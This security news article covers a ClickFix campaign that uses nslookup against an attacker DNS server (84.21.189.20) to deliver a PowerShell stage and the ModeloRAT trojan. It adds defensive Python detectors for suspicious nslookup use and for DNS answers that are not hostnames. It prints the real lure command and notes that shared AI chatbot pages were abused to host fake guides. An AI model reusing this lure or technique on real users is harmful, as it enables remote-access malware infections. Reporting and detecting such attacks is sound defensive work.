New ClickFix attack abuses nslookup to retrieve PowerShell payload via DNS

Cybercriminals Now Abusing DNS Queries in ClickFix Attacks to Deliver Malware

In a startling evolution of cyber threats, attackers have found a new way to exploit the Domain Name System (DNS) to deliver malware through ClickFix social engineering campaigns. This marks the first known instance where DNS queries are being used as a channel for malicious payload delivery, adding a new layer of complexity to an already sophisticated attack vector.

What is ClickFix?

ClickFix attacks have become a notorious method for cybercriminals to trick unsuspecting users into executing malicious commands. These attacks typically masquerade as legitimate prompts, such as fixing errors, installing updates, or enabling functionality. Victims are often lured into manually running commands that appear harmless but are, in fact, designed to compromise their systems.

The New DNS-Based ClickFix Technique

In this latest campaign, observed by Microsoft Threat Intelligence, attackers have taken ClickFix to a whole new level. Instead of relying on traditional web-based payload delivery, they are now using DNS queries to deliver the second-stage payload. Here’s how it works:

  1. The Lure: Victims are instructed to run the nslookup command in the Windows Run dialog box. This command queries an attacker-controlled DNS server instead of the system’s default DNS server.

  2. The Payload Delivery: The DNS response contains a malicious PowerShell script, which nslookup prints in the NAME: field of its output for the query. This script is then executed on the victim’s device.

  3. The Execution: The PowerShell script downloads additional malware from attacker-controlled infrastructure, ultimately leading to the installation of a remote access trojan (RAT) known as ModeloRAT.

How the Attack Unfolds

The attack begins with a seemingly innocuous command:

nslookup example.com 84.21.189.20

This command queries the attacker’s DNS server at 84.21.189.20 for the hostname example.com. The response from the server includes a malicious PowerShell script, which is then executed via the Windows command interpreter (cmd.exe).

The PowerShell script proceeds to download a ZIP archive containing a Python runtime executable and malicious scripts. These scripts perform reconnaissance on the infected device and domain, establish persistence by creating specific files and shortcuts, and ultimately deploy the ModeloRAT malware.
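The endpoint-side signal in the chain above is an nslookup invocation that names its own resolver. The following detector is an added example written for this article, not code from Microsoft or from the campaign; it runs over constructed process-creation records in the shape of (parent image, command line) telemetry, the allowlist of corporate resolvers is hypothetical, and the only value taken from the article is the server IP 84.21.189.20 in the sample event. It parses nslookup's `[-option ...] host [server]` syntax, flags an explicit resolver that is not allow-listed, raises the verdict when that resolver is a public IP or the command was spawned by explorer.exe (the parent of anything typed into the Run dialog), and ignores unrelated commands.

```python
import ipaddress

# Constructed sample telemetry: (parent image, command line). None of these
# records come from the article; the resolver IP in the third one is the
# attacker server the article names.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\cmd.exe", "nslookup intranet.corp.local"),
    ("C:\\Windows\\System32\\cmd.exe", "nslookup -type=mx corp.local 10.0.0.53"),
    ("C:\\Windows\\explorer.exe", "nslookup example.com 84.21.189.20"),
    ("C:\\Windows\\System32\\svchost.exe", "ipconfig /flushdns"),
]

# Hypothetical allowlist of the organisation's own resolvers.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.0.54"}


def parse_nslookup(cmdline):
    """Return (host, server) if cmdline invokes nslookup, else None.

    nslookup syntax: nslookup [-option ...] host [server]
    Options start with '-'; a bare '-' as host selects interactive mode.
    Parsing stops at a shell operator so a chained command is not
    mistaken for a positional argument.
    """
    tokens = cmdline.strip().split()
    start = None
    for i, tok in enumerate(tokens):
        if tok.rsplit("\\", 1)[-1].lower() in ("nslookup", "nslookup.exe"):
            start = i
            break
    if start is None:
        return None
    positional = []
    for tok in tokens[start + 1:]:
        if tok in ("|", "&", "&&", "||"):
            break
        if tok.startswith("-") and len(tok) > 1:
            continue  # e.g. -type=mx, -debug
        positional.append(tok)
    host = positional[0] if positional and positional[0] != "-" else None
    server = positional[1] if len(positional) > 1 else None
    return host, server


def assess(parent_image, cmdline):
    """Score one process-creation event.

    Returns None for non-nslookup commands; otherwise a dict with the parsed
    host/server, the reasons that fired and a verdict:
      'benign' - default or allow-listed resolver
      'review' - explicit resolver that is not allow-listed
      'high'   - such a resolver that is also a public IP, or the command
                 was spawned by explorer.exe (the Run dialog's parent)
    """
    parsed = parse_nslookup(cmdline)
    if parsed is None:
        return None
    host, server = parsed
    reasons = []
    if server is not None and server not in APPROVED_RESOLVERS:
        reasons.append("explicit resolver not on allowlist")
        try:
            ip = ipaddress.ip_address(server)
            if not (ip.is_private or ip.is_loopback):
                reasons.append("resolver is a public IP")
        except ValueError:
            pass  # resolver given by name; still worth review
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    if parent == "explorer.exe":
        reasons.append("parent is explorer.exe (Run dialog)")
    # explorer.exe alone (default resolver) is not escalated on its own
    if not reasons or reasons == ["parent is explorer.exe (Run dialog)"]:
        verdict = "benign"
    elif len(reasons) >= 2:
        verdict = "high"
    else:
        verdict = "review"
    return {"host": host, "server": server, "reasons": reasons, "verdict": verdict}


def scan(events):
    """Return the flagged events as (command line, verdict) pairs."""
    flagged = []
    for parent, cmdline in events:
        result = assess(parent, cmdline)
        if result is not None and result["verdict"] != "benign":
            flagged.append((cmdline, result["verdict"]))
    return flagged


if __name__ == "__main__":
    for cmdline, verdict in scan(SAMPLE_EVENTS):
        print(f"{verdict:6s} {cmdline}")
```

Tuning the allowlist to the organisation's real resolvers is what keeps the rule quiet: administrators do query specific servers with nslookup, but those servers are known, private, and not reached from a Run dialog.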

Why This Technique is Dangerous

This new approach is particularly concerning for several reasons:

  • Evasion: By using DNS queries, attackers can blend their malicious activity with normal DNS traffic, making it harder to detect.
  • Flexibility: Attackers can modify payloads on the fly by simply updating the DNS response, allowing for rapid adaptation to security measures.
  • Persistence: The use of DNS as a communication channel provides a stealthy method for maintaining long-term access to compromised systems.
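The evasion point cuts both ways: a DNS answer that carries script text has to place it in a name field, and script text does not look like a hostname. The check below is an added example, not part of the article or of Microsoft's tooling; it assumes resolver logs that expose the name field of each answer and runs over constructed records in a (client, queried name, answer name) shape. It validates each answer name against RFC 1123 hostname syntax (labels of 1 to 63 letters, digits and hyphens, no leading or trailing hyphen, at most 253 characters overall, with a leading underscore tolerated for service records) and returns the records that fail.

```python
import re

# One hostname label per RFC 1123; a leading underscore is tolerated so
# that service names such as _ldap._tcp.corp.local are not flagged.
_LABEL = re.compile(r"^_?[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

# Constructed resolver-log style records: (client, queried name, name field
# of the answer). Not taken from the article; the third record imitates an
# answer whose name field holds free text rather than a hostname.
SAMPLE_ANSWERS = [
    ("10.0.5.21", "www.corp.local", "web01.corp.local."),
    ("10.0.5.22", "_ldap._tcp.corp.local", "dc01.corp.local."),
    ("10.0.5.23", "example.com", "not a hostname; contains spaces and $symbols"),
    ("10.0.5.24", "example.net", "a" * 64 + ".example.net"),
]


def is_hostname_like(name):
    """True if name satisfies hostname syntax; script text never does."""
    name = name.rstrip(".")  # tolerate the trailing dot of an FQDN
    if not name or len(name) > 253:
        return False
    return all(_LABEL.match(label) for label in name.split("."))


def find_non_hostname_answers(records):
    """Return the records whose answer name fails hostname syntax."""
    return [rec for rec in records if not is_hostname_like(rec[2])]


if __name__ == "__main__":
    for client, qname, answer in find_non_hostname_answers(SAMPLE_ANSWERS):
        print(f"{client} asked {qname}: answer name is not a hostname ({answer[:40]!r})")
```

On the wire a DNS label is 63 arbitrary bytes, so nothing stops a server from returning text; this check is cheap precisely because legitimate answer names almost never break the syntax, while the remaining false positives (odd internal naming) are easy to allow-list per zone.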

The Broader Context of ClickFix Attacks

ClickFix attacks have been rapidly evolving over the past year, with threat actors experimenting with new delivery tactics and payload types. Previously, these attacks relied on convincing users to execute PowerShell or shell commands directly on their operating systems. However, recent campaigns have expanded beyond traditional malware delivery.

For example, the “ConsentFix” attack abuses the Azure CLI OAuth app to hijack Microsoft accounts without requiring a password, bypassing multi-factor authentication (MFA). Additionally, attackers have begun using shared ChatGPT and Grok pages, as well as Claude Artifact pages, to promote fake guides for ClickFix attacks.

In a novel twist, a recent ClickFix campaign promoted through Pastebin comments tricked cryptocurrency users into executing malicious JavaScript directly in their browsers while visiting a cryptocurrency exchange. This campaign was designed to hijack transactions rather than deploy traditional malware.

Conclusion

The use of DNS queries in ClickFix attacks represents a significant escalation in the sophistication of cyber threats. By leveraging the ubiquity and trust associated with DNS, attackers have found a new way to deliver malware while evading detection. As these attacks continue to evolve, it is crucial for individuals and organizations to stay vigilant, keep their systems updated, and be cautious of unsolicited prompts or commands.
